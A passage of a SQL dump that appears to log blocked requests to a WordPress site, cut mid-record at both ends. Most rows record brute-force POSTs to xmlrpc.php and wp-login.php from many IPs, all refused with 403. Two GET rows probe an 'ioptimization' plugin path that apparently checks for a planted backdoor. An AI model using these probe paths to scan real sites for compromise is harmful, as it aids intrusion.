Firefox\\/96\"}','a6SjNXZUIrAvc4D7HL1gTfeW',0,1665900133.7527,18632,'','POST',403,0,515,0,1,'',0),('106.14.141.22',1779338518,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fFgd3Bnx6jAZuPblQC5MNVDS',0,1665907095.6775,1301,'','POST',403,0,515,0,1,'',0),('213.152.161.85',3583549781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mjc4qJIkUGYCfeZPT3rQ6wVE',0,1665906948.9439,18329,'','POST',403,0,515,0,1,'',0),('46.101.168.131',778414211,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NAZXsQ7ij0YJvOHmFT4BRr3S',0,1665906342.8911,10646,'','POST',403,0,515,0,1,'',0),('103.153.214.231',1738135271,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GREjsPmkTQegu0Bf5yAt3JDN',0,1665906333.9443,19592,'','POST',403,0,515,0,1,'',0),('46.19.137.116',773032308,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','COSem76PuKxfQ9TLg5skAN08',0,1665905992.2130,18541,'','POST',403,0,515,0,1,'',0),('205.185.121.252',3451484668,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','2SagorukH9p4vK3eZBlyA8iz',0,1665905870.2269,1575,'','POST',403,0,600,0,1,'',0),('103.171.181.53',1739306293,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6YWaErecmCZB7vHXijSuyDdx',0,1665905336.6593,18485,'','POST',403,0,515,0,1,'',0),('162.144.49.214',2727358934,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AKSwejG57vxWYtyzD2b9qaks',0,1665905104.4211,17294,'','POST',403,0,515,0,1,'',0),('162.144.49.214',2727358934,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6t8lpJk0c2wuWPZB9savUVEj',0,1665905102.9399,18778,'','POST',403,0,515,0,1,'',0),('103.27.238.234',1729883882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SHEBNKfLxoePIrD8jdVCqZMF',0,1665904417.8253,18465,'','POST',403,0,515,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZebSVFTwGYPRaDd48uUKMnCf',0,1665911441.2713,19953,'','POST',403,0,515,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jTwO5ULr4atKCH6YMkZ7guxD',0,1665911443.2253,17999,'','POST',403,0,515,0,1,'',0),('195.93.152.83',3277690963,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KlMIFnZ5Jjy3p16qoaG8Xcgx',0,1665910640.2867,494,'','POST',403,0,515,0,1,'',0),('13.76.135.117',223119221,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3NQw1VB4YOTi6oSqIrJxHk0d',0,1665910604.2523,18176,'','POST',403,0,515,0,1,'',0),('103.180.120.176',1739880624,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pVDUkfTrmw8PQ9NdgvOl10ju',0,1665910318.2935,19341,'','POST',403,0,515,0,1,'',0),('61.12.67.132',1024213892,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PiHpItDORM4u6BYZULVJ0e89',0,1665909497.5218,1241,'','POST',403,0,515,0,1,'',0),('47.107.33.26',795549978,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cQg2iKbsWwTafBtd5VN1xEzk',0,1665909208.9085,18656,'','POST',403,0,515,0,1,'',0),('162.0.216.181',2717964469,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','p8Z0XfQOen3ylJ7sMW6mAovc',0,1665908426.0452,6107,'','POST',403,0,515,0,1,'',0),('194.42.98.32',3257557536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TYQHngesDWNbi8PA61IodkZu',0,1665908430.2551,1254,'','POST',403,0,515,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3HElLnZcjMGi0tp7wFuV8xJC',0,1665908155.1093,504,'','POST',403,0,515,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cGrzy0DoluV6iSgwWJPkFb1B',0,1665907363.9127,15126,'','POST',403,0,515,0,1,'',0),('79.143.85.14',1334793486,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QLKCvAXzk8PMhoSfEFVagU2R',0,1665908135.6253,19219,'','POST',403,0,515,0,1,'',0),('103.152.164.156',1738056860,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jmT8Zhac4K6I3XtCuvR0kqYJ',0,1665914054.4521,9427,'','POST',403,0,515,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0G6ytYn9jiaRLKkOmw3AJdIz',0,1665914053.2818,9903,'','POST',403,0,515,0,1,'',0),('159.65.147.193',2671875009,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CMqkg5WTdvBhGxrFyRQUpYHI',0,1665913772.1893,15937,'','POST',403,0,515,0,1,'',0),('159.65.147.193',2671875009,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','d1B2aKCWLy9pmbDAk8YXxQ0i',0,1665913770.3493,17711,'','POST',403,0,515,0,1,'',0),('139.196.152.3',2344916995,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3KaOpAM7v5C91dDrPGo60xnH',0,1665912880.3512,17434,'','POST',403,0,515,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KQFhfGBm2i4yS7E5xJPajMb6',0,1665912881.9351,15770,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gsiQfX4WP3VlmjLoInkMarOE',0,1665912598.8553,19216,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','n9becVwTvUg7dZu6QoBCpOER',0,1665912600.6804,17437,'','POST',403,0,515,0,1,'',0),('45.61.187.99',759020387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','7SxkoG4Uvd8Rn5yIfu0WJbPc',0,1665912018.6333,17990,'','POST',403,0,600,0,1,'',0),('80.77.135.125',1347258237,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KsPSYhzoL9VEbkMxAZUF3fq4',0,1665911738.2918,19044,'','POST',403,0,515,0,1,'',0),('213.152.161.240',3583549936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cKUzCaojZWemdLsBnqO4phSr',0,1665916559.7745,19019,'','POST',403,0,515,0,1,'',0),('42.200.109.156',717778332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','y7dOSksARoJqGTWejBtKxP0r',0,1665915239.4933,19439,'','POST',403,0,515,0,1,'',0),('51.159.105.232',866085352,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iS1OCsMr2QWoelHGmhDJNt6y',0,1665921479.5766,18736,'','POST',403,0,515,0,1,'',0),('134.209.105.240',2261871088,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hL6aAZRvotkIuOK3USqMbfy9',0,1665920209.7117,20604,'','POST',403,0,515,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','pEfnMivHlg4oPuTybGAY5cmW',0,1665919189.9777,1432,'','POST',403,0,600,0,1,'',0),('148.72.244.254',2487809278,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DqICNyYMfktEuSPx5ilJZcO3',0,1665918943.9164,19380,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','eljaF5BPwOoNLpST3bZqQJAR',0,1665924681.8050,540,'','POST',403,0,600,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zHAUClk7FWSIc2TvsXKqGxZL',0,1665924599.8782,2069,'','POST',403,0,515,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Pni5DjzF4QCvgKJ0klSbrM1w',0,1665924583.0011,18520,'','POST',403,0,515,0,1,'',0),('209.141.44.126',3515690110,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','c97TSYiBZjeVQ0HvRflD6OKU',0,1665924154.4443,10976,'','POST',403,0,600,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NX5WC76DO9FpmyPVgxq08aYH',0,1665922924.0182,20832,'','POST',403,0,515,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AODksrNBCSoE8hLmZv0anjzu',0,1665922924.0129,20837,'','POST',403,0,515,0,1,'',0),('82.166.39.15',1386620687,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','tEjrYHx1gNUs9OGZkPl54FQI',0,1665932172.8499,18523,'','POST',403,0,600,0,1,'',0),('148.72.207.163',2487799715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','NAsIX2jCzyhD3pFw4MeQK7vm',0,1665932203.8878,491,'','POST',403,0,600,0,1,'',0),('54.38.73.235',908478955,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','txQUfXRBT5rpiJEeOY30IsZ8',0,1665928324.6773,2899,'','POST',403,0,600,0,1,'',0),('3.34.104.242',52586738,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fRskzF7EJWpITQmZ5Ud6hvLO',0,1665926785.7217,526,'','POST',403,0,600,0,1,'',0),('81.70.248.169',1363605673,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','FEglaxPihHC2qMAwZko7nGIR',0,1665928294.9722,18738,'','POST',403,0,600,0,1,'',0),('121.42.231.47',2032854831,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','RwA1cKJ2peuSZHDYNP6ob47I',0,1665930654.4384,17537,'','POST',403,0,600,0,1,'',0),('167.71.234.124',2806508156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','skjGuzIDa3rxmM2ERtJYNnKC',0,1665930244.7437,17810,'','POST',403,0,600,0,1,'',0),('111.90.150.171',1868207787,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ytRG7N0SWekVQCLlzaTJFr9A',0,1665930004.2344,1235,'','POST',403,0,600,0,1,'',0),('103.92.27.198',1734089670,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9rmsOeDpcEPjkFRJ1BndGWUL',0,1665930000.8687,1135,'','POST',403,0,600,0,1,'',0),('195.178.120.231',3283253479,'','http://cteisys.com/wp-content/plugins/ioptimization/index.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','MFJsXALybdmgOSka3iUW0lG4',0,1665929951.0182,310,'','GET',403,0,700,0,1,'',0),('195.178.120.231',3283253479,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','TbPo183vJFRB2pOmGflLejDQ',0,1665929922.5126,283,'','GET',403,0,700,0,1,'',0),('103.221.220.140',1742593164,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7Y5ARVTdQxJ1GqOswZuKeL4k',0,1665929341.8508,565,'','POST',403,0,600,0,1,'',0),('209.141.49.253',3515691517,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','Rgq8M0GiUDPebVdKTFaulcvt',0,1665935033.8217,509,'','POST',403,0,600,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','fQrAktOKcnGsxljHBompNSLv',0,1665934850.4924,508,'','POST',403,0,600,0,1,'',0),('138.68.140.0',2319748096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','V2gthefKRUc1uH4o8sMxZGW7',0,1665934544.1283,17875,'','POST',403,0,600,0,1,'',0),('51.91.151.60',861640508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','NmFjJ4SihwOE1rcpD7I9tyza',0,1665934133.0043,18718,'','POST',403,0,600,0,1,'',0),('134.19.179.187',2249438139,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cUlzqnePuv9Eg7byfVoR50pd',0,1665938397.9171,13177,'','POST',403,0,515,0,1,'',0),('81.70.248.169',1363605673,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','ZeUWOkhY9u3tsjgR61MC5iLP',0,1665938396.7685,13576,'','POST',403,0,600,0,1,'',0),('148.72.214.194',2487801538,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','jvmThlx9nJEtRUoDKSHb67aN',0,1665937991.6966,2101,'','POST',403,0,600,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','ijBUESToAnd6OmwF3v1L09yZ',0,1665936085.0043,459,'','POST',403,0,600,0,1,'',0),('128.199.100.142',2160551054,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','BfkLb98nhvCeIY2uaRKr03JP',0,1665936055.1698,17685,'','POST',403,0,600,0,1,'',0),('89.249.74.218',1509509850,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OMycx6H201lJBGSvVQnijpwC',0,1665942504.2371,7010,'','POST',403,0,515,0,1,'',0),('89.249.74.218',1509509850,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uVCrD3LJSOjcwqk4A6t9XPhs',0,1665942384.3393,14480,'','POST',403,0,515,0,1,'',0),('82.165.184.74',1386592330,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','U1Q8HljrTdNOKcaY7zA4hupM',0,1665942237.8996,17310,'','POST',403,0,600,0,1,'',0),('142.93.203.156',2388511644,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','hHal7GRiOoknZWYQT5w1t4CJ',0,1665941832.9541,18053,'','POST',403,0,600,0,1,'',0),('62.102.148.164',1046910116,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gcv3HRF8wptYhfaxXDOlMekG',0,1665940778.7395,2257,'','POST',403,0,515,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','QtOWnwJaEHieSkI45ZV2xvzq',0,1665939931.7372,615,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','Qp6D2M7BJoebVcNj15fhGdA8',0,1665939900.9133,18749,'','POST',403,0,600,0,1,'',0),('103.163.139.202',1738771402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','NWl6AV0K8UXuPc2Iz1tD935E',0,1665946006.0744,10979,'','POST',403,0,600,0,1,'',0),('95.217.179.54',1608102710,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','4wc0zjFvuxyhqZ9PdCQV7XMe',0,1665945606.9023,18782,'','POST',403,0,600,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','KXs69uPlmQWCa8HNdUeyLR7c',0,1665943725.1153,18358,'','POST',403,0,600,0,1,'',0),('103.163.139.202',1738771402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','zFckuTNmwSnb24q6xsriHJMg',0,1665943755.1488,612,'','POST',403,0,600,0,1,'',0),('159.223.170.181',2682235573,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','OfJiXjl20IULkQEBwTArc36h',0,1665949374.5961,1346,'','POST',403,0,600,0,1,'',0),('185.206.225.51',3117343027,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8fOoraD5U10MpERgleiKxAnb',0,1665949110.8013,1193,'','POST',403,0,515,0,1,'',0),('193.37.254.3',3240492547,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Jv8XViDLZx3hReSGj2zg10q5',0,1665949056.6213,18537,'','POST',403,0,515,0,1,'',0),('159.203.143.36',2680917796,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','UYAmIcbsoGdJV5ENZ2hDStXH',0,1665947519.8544,1163,'','POST',403,0,600,0,1,'',0),('213.152.161.85',3583549781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','enJXEcY3yTNbWrk6d4t5DqO1',0,1665947414.4276,2629,'','POST',403,0,515,0,1,'',0),('103.130.218.178',1736628914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','gweLA418sVuCrmZR5qhT2jH0',0,1665947490.3784,1198,'','POST',403,0,600,0,1,'',0),('109.168.97.89',1839751513,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','dlyb7DXZ2tKQBPWcJsSrGL6k',0,1665957472.8393,17081,'','POST',403,0,600,0,1,'',0),('93.114.185.76',1567799628,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','QsayFoTDXdhVnO3mJrUSAIvG',0,1665953594.6825,18282,'','POST',403,0,600,0,1,'',0),('46.105.29.21',778640661,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','MOhXiL2VQIk5JEjaFH7PoT3y',0,1665953188.0191,15862,'','POST',403,0,600,0,1,'',0),('95.217.129.44',1608089900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','tUgXrRvOieCbP7KxJE4YThSc',0,1665951292.2815,1358,'','POST',403,0,600,0,1,'',0),('213.152.161.15',3583549711,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','WD4eRqoQzjA6YitTPrZS7flH',0,1665952035.4793,18440,'','POST',403,0,515,0,1,'',0),('185.2.4.33',3103917089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows 